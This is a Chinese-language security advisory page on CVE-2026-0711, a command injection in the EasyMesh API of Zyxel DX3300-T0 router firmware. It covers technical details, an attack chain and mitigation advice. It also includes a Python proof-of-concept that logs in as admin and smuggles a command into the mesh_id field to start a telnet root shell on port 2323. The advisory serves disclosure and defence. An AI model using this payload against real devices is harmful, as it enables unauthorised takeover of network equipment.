IPBUF安全漏洞报告
English
CVE-2026-0711 CVSS 6.8 中危

CVE-2026-0711 Zyxel DX3300-T0命令注入漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-0711
漏洞类型
命令注入
CVSS评分
6.8 中危
攻击向量
邻接 (AV:A)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Zyxel DX3300-T0 固件

相关标签

命令注入ZyxelDX3300-T0EasyMeshRCEIoT

漏洞概述

Zyxel DX3300-T0路由器固件在EasyMesh相关API接口中存在一处命令注入漏洞。该漏洞影响5.50(ABVY.7.1)C0及之前的版本。由于未能正确过滤用户输入,拥有管理员权限且物理邻近的攻击者可以在通过身份验证后,向易受攻击的接口发送特制请求。成功利用该漏洞可能导致攻击者在底层操作系统上执行任意命令,从而完全控制受影响设备的机密性、完整性和可用性。

技术细节

该漏洞属于典型的操作系统命令注入(OS Command Injection)。其根本原因在于Zyxel DX3300-T0固件中与EasyMesh功能相关的API接口在处理用户输入时缺乏严格的校验机制。当设备管理员通过Web界面或API调用配置EasyMesh相关参数时,应用程序将用户提交的数据直接拼接到底层系统命令中执行,而非使用安全的API或经过转义处理。利用条件较为苛刻,要求攻击者必须是经过身份验证的管理员(PR:H),且攻击向量为邻接网络(AV:A)。攻击者首先需要获取管理员凭证登录设备,随后构造包含恶意Shell指令的HTTP POST请求发送至特定的EasyMesh API端点。服务器接收到请求后,会解析参数并执行系统命令,恶意载荷随之被Shell解释器执行,从而赋予攻击者设备操作系统的最高权限(如C:H/I:H/A:H所示),允许读取敏感数据、篡改配置或导致服务拒绝。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标设备为Zyxel DX3300-T0,并确定其固件版本存在漏洞。
STEP 2
2. 获取凭证
攻击者通过钓鱼、暴力破解或其他手段获取设备的管理员账号密码。
STEP 3
3. 发起攻击
攻击者使用管理员身份登录,并构造包含恶意命令的HTTP POST请求发送至EasyMesh相关API接口。
STEP 4
4. 执行命令
设备后端未过滤输入,直接将恶意参数拼接至系统命令执行,导致攻击者获得OS Shell权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_url = "http://<target_ip>/api/ezmesh/setup" username = "admin" password = "admin_password" # 1. Authenticate and get session cookie session = requests.Session() login_payload = {"username": username, "password": password} login_resp = session.post("http://<target_ip>/api/login", json=login_payload) if login_resp.status_code == 200: print("[+] Login successful") # 2. Inject command via EasyMesh API # Payload attempts to append a shell command (e.g., telnet enable) # Using semicolon to separate commands injection_payload = { "mesh_id": "default; /bin/telnetd -l /bin/sh -p 2323", "action": "update" } exploit_resp = session.post(target_url, json=injection_payload) if exploit_resp.status_code == 200: print("[+] Payload sent successfully") print("[+] Check if telnet is running on port 2323") else: print("[-] Failed to send payload") else: print("[-] Login failed")

影响范围

Zyxel DX3300-T0 <= 5.50(ABVY.7.1)C0

防御指南

临时缓解措施
建议用户立即检查设备固件版本,若低于修复版本,请尽快升级。在未升级前,应严格限制EasyMesh功能的使用,并确保仅允许可信的内网设备访问管理后台,关闭不必要的管理服务端口(如Telnet, SSH from WAN),以减少攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表